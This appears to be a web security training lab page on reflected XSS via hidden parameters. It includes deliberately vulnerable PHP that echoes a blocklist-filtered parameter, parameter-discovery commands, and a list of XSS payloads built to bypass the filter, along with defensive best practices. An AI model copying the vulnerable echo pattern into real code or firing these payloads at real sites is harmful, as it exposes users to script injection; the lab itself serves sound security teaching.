Advanced Hidden Parameter XSS Lab

Discover multiple hidden parameters and bypass advanced filtering

Advanced Hidden Parameter Challenge

Lab Overview

This lab contains multiple hidden parameters with advanced filtering. The visible form uses secure HTML encoding, but there are several hidden endpoints with more complex filtering.

Visible Challenge: Basic HTML encoding using htmlspecialchars() for both first name and last name parameters.
Hidden Parameters: There are multiple hidden parameters that are not shown in the form. Use tools like Arjun to discover them!
id cat page number page_id categoryid
Advanced Filter: Complex string replacement that removes multiple dangerous strings and obfuscation attempts
Blocked strings include:
script
alert
confirm
prompt
eval
img
svg
onfocus
ontoggle
onmousemove
onmouseover
Case variations
Hex encoding
Unicode escapes
Filter method: str_replace($arr, '', $_GET['parameter']) with extensive blocklist
Filter Complexity: Advanced String Replacement

Objective: Discover the hidden parameters and bypass the advanced filter to execute XSS.

Backend Source Code 
if(isset($_GET["fname"]) && isset($_GET["lname"])){
    echo htmlspecialchars($_GET["fname"], ENT_QUOTES);
    echo htmlspecialchars($_GET["lname"], ENT_QUOTES);
}
elseif(isset($_GET["id"])){
    $arr = array('details','alert','confirm','prompt','eval','details','ontoggle','onmousemove','onmouseover','script','Script','sCript','scRipt','scrIpt','scriPt','scripT','SCript','SCRipt','SCRIpt','SCRIPt','SCRIPT','script','img','image','svg','onfocus', '"c"+"onfirm(1)">', '"co"+"nfirm(1)">', '"con"+"firm(1)">', '"conf"+"irm(1)">', '"confi"+"rm(1)">', '"confir"+"m(1)">', '"confirm"+"(1)">', '"c"+"o"+"n"+"f"+"i"+"r"+"m"+"(1)">', "confirm(1)>", "confirm(1)>", "confirm(1)>", "confirm(1)>", "confirm(1)>", "confirm(1)>", "confirm(1)>", "confirm(1)>", "\u0063onfirm(1)>", "c\u006fnfirm(1)>", "co\u006efirm(1)>", "con\u0066irm(1)>", "conf\u0069rm(1)>", "confi\u0072m(1)>", "confir\u006d(1)>", "\u0063\u006f\u006e\u0066\u0069\u0072\u006d(1)>");
    $re = str_replace($arr, '', $_GET['id']);
    echo $re;
}
// Similar code for cat, page, number, page_id, categoryid
# use arjun tool to find hidden parameters
Test Input Forms
Challenge 1: HTML Encoding (Visible)
This field uses htmlspecialchars() encoding
This field uses htmlspecialchars() encoding
Challenge 2: Hidden Parameters
Hint: There are multiple parameter names not shown in the form. You need to discover them using parameter discovery tools.
id cat page number page_id categoryid
These parameters use advanced filtering with extensive blocklist
Parameter Discovery & Bypass Techniques
Parameter Discovery Tools:
  • Arjun: arjun -u https://example.com
  • ParamSpider: python3 paramspider.py -d example.com
  • FFUF: ffuf -w wordlist.txt -u https://example.com?FUZZ=test
  • Manual testing: Try common parameter names like: id, page, view, search, q, s, item, product, cat, category, number, etc.
Bypass Techniques for Advanced Filter:
  • Alternative tags: Use <iframe>, <object>, <embed>
  • Alternative events: Use onload, onerror, onclick
  • Encoding: Try different encoding methods not in the filter
  • Template literals: Use ${alert(1)} in certain contexts
  • Uncommon tags: Try <marquee>, <audio>, <video>
Security Implications

This lab demonstrates:

  • Multiple hidden parameters create complex attack surfaces
  • Advanced filters can still have bypasses
  • Blocklist-based filtering is inherently incomplete
  • Parameter discovery is critical for comprehensive security testing
  • Different parameters may have different security implementations
  • Complex filters can create false sense of security
Best Practices

For secure web applications:

  • Use allowlist-based validation instead of blocklists
  • Implement context-aware output encoding
  • Use Content Security Policy (CSP) headers
  • Conduct thorough parameter discovery during testing
  • Document all API endpoints and parameters
  • Use security headers: X-XSS-Protection, X-Content-Type-Options
  • Regularly update and test security controls
Payload Examples for Advanced Filter
Alternative Tag Vectors:
  • <iframe src="javascript:alert(1)">
  • <object data="javascript:alert(1)">
  • <embed src="javascript:alert(1)">
  • <base href="javascript:alert(1)//">
  • <form action="javascript:alert(1)"><input type=submit>
Alternative Event Handlers:
  • <body onload=alert(1)>
  • <input onfocus=alert(1) autofocus>
  • <select onfocus=alert(1) autofocus>
  • <textarea onfocus=alert(1) autofocus>
  • <keygen onfocus=alert(1) autofocus>
Advanced Bypass Techniques:
  • <marquee onstart=alert(1)> - Marquee tag with onstart
  • <audio src=x onerror=alert(1)> - Audio tag
  • <video src=x onerror=alert(1)> - Video tag
  • <applet code="javascript:alert(1)"> - Applet tag
  • <isindex type=image src=1 onerror=alert(1)> - Isindex tag
  • <button onfocus=alert(1) autofocus> - Button with autofocus